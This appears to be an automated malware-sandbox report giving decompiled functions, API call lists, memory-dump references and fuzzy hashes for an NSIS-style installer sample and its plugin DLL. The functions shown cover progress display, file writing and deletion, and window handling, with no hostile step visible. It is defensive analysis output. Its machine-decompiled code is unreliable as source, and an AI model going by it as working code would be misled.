				short _v132;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x41ea18; // 0x94bc4
					_t11 =  *0x42aa24; // 0x94bc8
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}

0x00402fa3
0x00402fb1
0x00402fb7
0x00402fb7
0x00402fc5
0x00402fc7
0x00402fcd
0x00402fd4
0x00402fd6
0x00402fd6
0x00402fec
0x00402ffc
0x0040300e
0x0040300e
0x00403016

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
MulDiv.KERNEL32(00094BC4,00000064,00094BC8), ref: 00402FDC
wsprintfW.USER32 ref: 00402FEC
SetWindowTextW.USER32(?,?), ref: 00402FFC
SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E

Strings

verifying installer: %d%%, xrefs: 00402FE6

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69

Uniqueness

Uniqueness Score: -1.00%

Function 6F3D2655 Relevance: 9.1, APIs: 6, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E6F3D2655() {
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t27;
				signed int _t39;
				void* _t40;
				void* _t43;
				intOrPtr _t44;
				void* _t45;

				_t40 = E6F3D12BB();
				_t24 =  *((intOrPtr*)(_t45 + 0x18));
				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
				_t43 = (_t44 + 0x81 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
					}
					_t39 =  *(_t43 - 8) & 0x000000ff;
					if(_t39 <= 7) {
						switch( *((intOrPtr*)(_t39 * 4 +  &M6F3D2784))) {
							case 0:
								 *_t40 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									 *(__esp + 0x10) = __ecx;
									__ecx =  *(0x6f3d407c + __edx * 4);
									__edx =  *(__esp + 0x10);
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x6f3d409c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E6F3D1510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__ecx =  *0x6f3d506c;
								__edx = __ecx - 1;
								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
								__eax =  *0x6f3d506c;
								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
								goto L17;
							case 4:
								__eax = lstrcpynW(__edi,  *__eax,  *0x6f3d506c);
								goto L17;
							case 5:
								_push( *0x6f3d506c);
								_push(__edi);
								_push( *__eax);
								__imp__StringFromGUID2();
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfW(__edi, 0x6f3d5000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t26 =  *(_t43 + 0x14);
					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
						GlobalFree(_t26);
					}
					_t27 =  *((intOrPtr*)(_t43 + 0xc));
					if(_t27 != 0) {
						if(_t27 != 0xffffffff) {
							if(_t27 > 0) {
								E6F3D1381(_t27 - 1, _t40);
								goto L26;
							}
						} else {
							E6F3D1312(_t40);
							L26:
						}
					}
					_t44 = _t44 - 1;
					_t43 = _t43 - 0x20;
				} while (_t44 >= 0);
				return GlobalFree(_t40);
			}

0x6f3d265f
0x6f3d2661
0x6f3d2665
0x6f3d2674
0x6f3d2678
0x6f3d267d
0x6f3d267d
0x6f3d2685
0x6f3d268c
0x6f3d2692
0x00000000
0x6f3d2699
0x00000000
0x00000000
0x6f3d26a1
0x6f3d26a5
0x6f3d26a8
0x6f3d26ac
0x6f3d26b3
0x6f3d26b7
0x6f3d26bd
0x6f3d26bf
0x6f3d26c1
0x6f3d26c1
0x6f3d26c8
0x00000000
0x00000000
0x6f3d26d1
0x00000000
0x00000000
0x6f3d26d8
0x6f3d26de
0x6f3d26e8
0x6f3d26ee
0x6f3d26f3
0x00000000
0x00000000
0x6f3d2714
0x00000000
0x00000000
0x6f3d26fa
0x6f3d2700
0x6f3d2701
0x6f3d2703
0x00000000
0x00000000
0x6f3d271c
0x6f3d271e
0x6f3d2724
0x6f3d272a
0x6f3d272a
0x00000000
0x00000000
0x6f3d2692
0x6f3d272d
0x6f3d272d
0x6f3d2732
0x6f3d2743
0x6f3d2743
0x6f3d2749
0x6f3d274e
0x6f3d2753
0x6f3d275f
0x6f3d2764
0x00000000
0x6f3d2769
0x6f3d2755
0x6f3d2756
0x6f3d276a
0x6f3d276a
0x6f3d2753
0x6f3d276b
0x6f3d276c
0x6f3d276f
0x6f3d2783

APIs

Part of subcall function 6F3D12BB: GlobalAlloc.KERNEL32(00000040,?,6F3D12DB,?,6F3D137F,00000019,6F3D11CA,-000000A0), ref: 6F3D12C5

GlobalFree.KERNEL32(?), ref: 6F3D2743
GlobalFree.KERNEL32(00000000), ref: 6F3D2778

Memory Dump Source

Source File: 00000001.00000002.18505223638.000000006F3D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F3D0000, based on PE: true

Associated: 00000001.00000002.18505136073.000000006F3D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.18505336167.000000006F3D4000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.18505402042.000000006F3D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6f3d0000_SecuriteInfo.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 4c21d903eef44c4570cded72baa77f522c973c283a00938b539a8f83e0f0b6f1
Instruction ID: 375418752c3537d3829a12079d7477de9e1045bae9beb56735ba2c6838d6be63
Opcode Fuzzy Hash: 4c21d903eef44c4570cded72baa77f522c973c283a00938b539a8f83e0f0b6f1
Instruction Fuzzy Hash: 8E31E072608601EFCB269F68CB84C2EB7BEFF87315314462DF14093261C732E8258B61

Uniqueness

Uniqueness Score: -1.00%

Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00402950(int __ebx, void* __eflags) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				int _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405E83(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406008(_t55);
				_t29 = E0040602D(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x434f14;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004034E5(_t49);
							E004034CF(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00405FE8( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E004060DF( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}

0x00402950
0x00402952
0x00402957
0x0040295c
0x0040295f
0x00402969
0x0040296d
0x0040296d
0x00402973
0x00402980
0x00402988
0x0040298b
0x00402997
0x0040299a
0x004029a0
0x004029ae
0x004029b3
0x004029b7
0x004029ba
0x004029c3
0x004029cf
0x004029d3
0x004029d6
0x004029e0
0x004029ff
0x004029ec
0x004029f4
0x004029f7
0x004029fc
0x004029fc
0x00402a06
0x00402a06
0x00402a13
0x00402a19
0x00402a1f
0x00402a1f
0x004029b7
0x00402a33
0x00402a35
0x00402a35
0x00402a3f
0x00402a40
0x00402a44
0x00402a48
0x00402a4e
0x00402a4e
0x00402a55
0x004022f1
0x00402c2d
0x00402c39

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
GlobalFree.KERNEL32(?), ref: 00402A06
GlobalFree.KERNEL32(00000000), ref: 00402A19
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
Opcode Fuzzy Hash: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8

Uniqueness

Uniqueness Score: -1.00%

Function 6F3D2480 Relevance: 7.6, APIs: 5, Instructions: 135
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E6F3D2480(void* __edx) {
				void* _t37;
				signed int _t38;
				void* _t39;
				void* _t41;
				signed char* _t42;
				signed char* _t51;
				void* _t52;
				void* _t54;

				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
				while(1) {
					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
					_t52 = _t51[0x18];
					if(_t52 == 0) {
						goto L9;
					}
					_t41 = 0x1a;
					if(_t52 == _t41) {
						goto L9;
					}
					if(_t52 != 0xffffffff) {
						if(_t52 <= 0 || _t52 > 0x19) {
							_t51[0x18] = _t41;
							goto L12;
						} else {
							_t37 = E6F3D135A(_t52 - 1);
							L10:
							goto L11;
						}
					} else {
						_t37 = E6F3D12E3();
						L11:
						_t52 = _t37;
						L12:
						_t13 =  &(_t51[8]); // 0x1020
						_t42 = _t13;
						if(_t51[4] >= 0) {
						}
						_t38 =  *_t51 & 0x000000ff;
						_t51[0x1c] = 0;
						if(_t38 > 7) {
							L27:
							_t39 = GlobalFree(_t52);
							if( *(_t54 + 0x10) == 0) {
								return _t39;
							}
							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
							} else {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t38 * 4 +  &M6F3D25F8))) {
								case 0:
									 *_t42 = 0;
									goto L27;
								case 1:
									__eax = E6F3D13B1(__ebp);
									goto L21;
								case 2:
									 *__edi = E6F3D13B1(__ebp);
									__edi[1] = __edx;
									goto L27;
								case 3:
									__eax = GlobalAlloc(0x40,  *0x6f3d506c);
									 *(__esi + 0x1c) = __eax;
									__edx = 0;
									 *__edi = __eax;
									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x6f3d506c, __eax,  *0x6f3d506c, 0, 0);
									goto L27;
								case 4:
									__eax = E6F3D12CC(__ebp);
									 *(__esi + 0x1c) = __eax;
									L21:
									 *__edi = __eax;
									goto L27;
								case 5:
									__eax = GlobalAlloc(0x40, 0x10);
									_push(__eax);
									 *(__esi + 0x1c) = __eax;
									_push(__ebp);
									 *__edi = __eax;
									__imp__CLSIDFromString();
									goto L27;
								case 6:
									if( *__ebp != __cx) {
										__eax = E6F3D13B1(__ebp);
										 *__ebx = __eax;
									}
									goto L27;
								case 7:
									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
									( *(__esi + 0x18) - 1) *  *0x6f3d506c =  *0x6f3d5074 + ( *(__esi + 0x18) - 1) *  *0x6f3d506c * 2 + 0x18;
									 *__ebx =  *0x6f3d5074 + ( *(__esi + 0x18) - 1) *  *0x6f3d506c * 2 + 0x18;
									asm("cdq");
									__eax = E6F3D1510(__edx,  *0x6f3d5074 + ( *(__esi + 0x18) - 1) *  *0x6f3d506c * 2 + 0x18, __edx,  *0x6f3d5074 + ( *(__esi + 0x18) - 1) *  *0x6f3d506c * 2);
									goto L27;
							}
						}
					}
					L9:
					_t37 = E6F3D12CC(0x6f3d5044);
					goto L10;
				}
			}

0x6f3d2494
0x6f3d2498
0x6f3d24a3
0x6f3d24a3
0x6f3d24aa
0x6f3d24af
0x00000000
0x00000000
0x6f3d24b3
0x6f3d24b6
0x00000000
0x00000000
0x6f3d24bb
0x6f3d24c6
0x6f3d24d6
0x00000000
0x6f3d24cd
0x6f3d24cf
0x6f3d24e5
0x00000000
0x6f3d24e5
0x6f3d24bd
0x6f3d24bd
0x6f3d24e6
0x6f3d24e6
0x6f3d24e8
0x6f3d24ec
0x6f3d24ec
0x6f3d24ef
0x6f3d24ef
0x6f3d24f7
0x6f3d24ff
0x6f3d2502
0x6f3d25c1
0x6f3d25c2
0x6f3d25cd
0x6f3d25f7
0x6f3d25f7
0x6f3d25dd
0x6f3d25e9
0x6f3d25df
0x6f3d25df
0x6f3d25df
0x00000000
0x6f3d2508
0x6f3d2508
0x00000000
0x6f3d250f
0x00000000
0x00000000
0x6f3d2517
0x00000000
0x00000000
0x6f3d2525
0x6f3d2527
0x00000000
0x00000000
0x6f3d2548
0x6f3d254e
0x6f3d2551
0x6f3d2553
0x6f3d2563
0x00000000
0x00000000
0x6f3d2530
0x6f3d2535
0x6f3d2538
0x6f3d2539
0x00000000
0x00000000
0x6f3d256f
0x6f3d2575
0x6f3d2576
0x6f3d2579
0x6f3d257a
0x6f3d257c
0x00000000
0x00000000
0x6f3d2588
0x6f3d258b
0x6f3d2597
0x6f3d2599
0x00000000
0x00000000
0x6f3d25a5
0x6f3d25b1
0x6f3d25b4
0x6f3d25b6
0x6f3d25b9
0x00000000
0x00000000
0x6f3d2508
0x6f3d2502
0x6f3d24db
0x6f3d24e0
0x00000000
0x6f3d24e0

APIs

GlobalFree.KERNEL32(00000000), ref: 6F3D25C2

Part of subcall function 6F3D12CC: lstrcpynW.KERNEL32(00000000,?,6F3D137F,00000019,6F3D11CA,-000000A0), ref: 6F3D12DC

GlobalAlloc.KERNEL32(00000040), ref: 6F3D2548
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6F3D2563

Memory Dump Source

Source File: 00000001.00000002.18505223638.000000006F3D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F3D0000, based on PE: true

Associated: 00000001.00000002.18505136073.000000006F3D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.18505336167.000000006F3D4000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.18505402042.000000006F3D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6f3d0000_SecuriteInfo.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: 49256c5a8efc62e875f06fe5e017a048fce94b5dcf5257e6bf2bfbeea6ca6030
Instruction ID: 6850a99c8bd11ad31e24c44a60737508c4652942143e695fa87a745367cead70
Opcode Fuzzy Hash: 49256c5a8efc62e875f06fe5e017a048fce94b5dcf5257e6bf2bfbeea6ca6030
Instruction Fuzzy Hash: 8841AFB2008709DFD714EF28DA40E66B7BDFB95320F008A1EF84586581EB31E544CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x434f00,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E00406484();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}

0x00401d81
0x00401d85
0x00401d9a
0x00401d87
0x00401d89
0x00401d8f
0x00401d8f
0x00401da0
0x00401da3
0x00401dad
0x00401db0
0x00401db8
0x00401dc9
0x00401dcc
0x00401dd7
0x00401dce
0x00401dd0
0x00401dd0
0x00401ddb
0x00401de5
0x00401e0c
0x00401e1b
0x00401e29
0x00401e31
0x00401e39
0x00401e39
0x00401e42
0x00401e48
0x00402ba4
0x00402ba4
0x00402c2d
0x00402c39

APIs

GetDlgItem.USER32(?,?), ref: 00401D9A
GetClientRect.USER32(?,?), ref: 00401DE5
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
DeleteObject.GDI32(00000000), ref: 00401E39

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
Instruction ID: b69f8f45c5cbb28dd5603d9b1d667d2ce3d3910c133b75fee4ecc707c572ca23
Opcode Fuzzy Hash: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
Instruction Fuzzy Hash: 3321F672904119AFCB05DBA4DE45AEEBBB5EF08314F14003AFA45F62A0DB389951DB98

Uniqueness

Uniqueness Score: -1.00%

Function 6F3D16BD Relevance: 7.5, APIs: 5, Instructions: 41
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F3D16BD(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t14;

				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t14);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}

0x6f3d16d7
0x6f3d16e3
0x6f3d16f0
0x6f3d16f7
0x6f3d1700
0x6f3d170c

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6F3D22D8,?,00000808), ref: 6F3D16D5
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6F3D22D8,?,00000808), ref: 6F3D16DC
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6F3D22D8,?,00000808), ref: 6F3D16F0
GetProcAddress.KERNEL32(6F3D22D8,00000000), ref: 6F3D16F7
GlobalFree.KERNEL32(00000000), ref: 6F3D1700

Memory Dump Source

Source File: 00000001.00000002.18505223638.000000006F3D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F3D0000, based on PE: true

Associated: 00000001.00000002.18505136073.000000006F3D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.18505336167.000000006F3D4000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.18505402042.000000006F3D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6f3d0000_SecuriteInfo.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 0351744fde066b1d194bb50cd16fea4244fc44a68f77f1d16b04741af9402983
Instruction ID: d38bc1425cebcd3207ba8d7106548f028f91bab0975480abe15c374ffed32520
Opcode Fuzzy Hash: 0351744fde066b1d194bb50cd16fea4244fc44a68f77f1d16b04741af9402983
Instruction Fuzzy Hash: 96F0AC722065387BDA2117A6CC4CC9BBE9CEF8B2F5B110215F628E219086615D15DBF1

Uniqueness

Uniqueness Score: -1.00%

Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E00406484();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c43
0x00401c45
0x00401c4c
0x00401c4f
0x00401c52
0x00401c5c
0x00401c60
0x00401c63
0x00401c6c
0x00401c6c
0x00401c6f
0x00401c73
0x00401c7c
0x00401c7c
0x00401c7f
0x00401c83
0x00401c85
0x00401cda
0x00401cdc
0x00401ce7
0x00401cf1
0x00401cf4
0x00401cf4
0x00401cfd
0x00000000
0x00401c87
0x00401c8e
0x00401c90
0x00401c93
0x00401c99
0x00401ca0
0x00401ca3
0x00401ccb
0x00401d03
0x00401d03
0x00401ca5
0x00401cb3
0x00401cbb
0x00401cbe
0x00401cbe
0x00401ca3
0x00401d06
0x00401d09
0x00401d0f
0x00402ba4
0x00402ba4
0x00402c2d
0x00402c39

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB

Strings

!, xrefs: 00401C7F

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

